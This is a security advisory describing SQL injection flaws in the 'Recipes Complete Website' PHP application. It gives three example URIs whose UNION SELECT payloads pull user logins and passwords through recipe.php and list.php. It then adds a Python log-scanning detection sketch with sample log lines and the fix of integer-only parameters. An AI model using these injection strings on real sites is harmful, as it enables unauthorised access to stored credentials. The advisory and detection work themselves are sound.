Recipes Complete Website SQL Injection Vulnerabilities

An attacker can exploit these issues via a web client.

The following URIs demonstrate these issues:

http://www.example.com/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* - login
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password
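
Detection sketch for the requests shown above, added here as an example and not part of the original advisory or the vendor's code. It assumes combined-format web server access logs and that recipeid, categoryid and pagenum are meant to be integers; the log lines, client addresses and the /site/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters per script, taken from the URIs in the advisory; treating them
# as integer-only is an assumption based on how they are used there.
NUMERIC_PARAMS = {
    "recipe.php": ("recipeid",),
    "list.php": ("pagenum", "categoryid"),
}
# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"-?\d+")
SQL_RE = re.compile(r"\bunion\b.*\bselect\b|/\*", re.I | re.S)

def inspect_line(line):
    """Return (script, param, decoded_value, reason) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    # parse_qs percent-decodes values, so %20UNION%20SELECT is matched in clear.
    query = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for param in NUMERIC_PARAMS.get(script, ()):
        for value in query.get(param, []):
            if INT_RE.fullmatch(value.strip()):
                continue  # well-formed integer, nothing to report
            reason = "sql-keywords" if SQL_RE.search(value) else "non-integer"
            findings.append((script, param, value, reason))
    return findings

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /site/recipe.php?recipeid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /site/recipe.php?recipeid='
    '-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* HTTP/1.1" 200 734',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] '
    '"GET /site/list.php?pagenum=0&categoryid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for finding in inspect_line(entry):
            print(finding)
```

The same integer-only rule is the fix on the application side: cast or reject these parameters before they reach the query, and bind them as parameters instead of concatenating them into SQL.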


 

Copyright 2010, SecurityFocus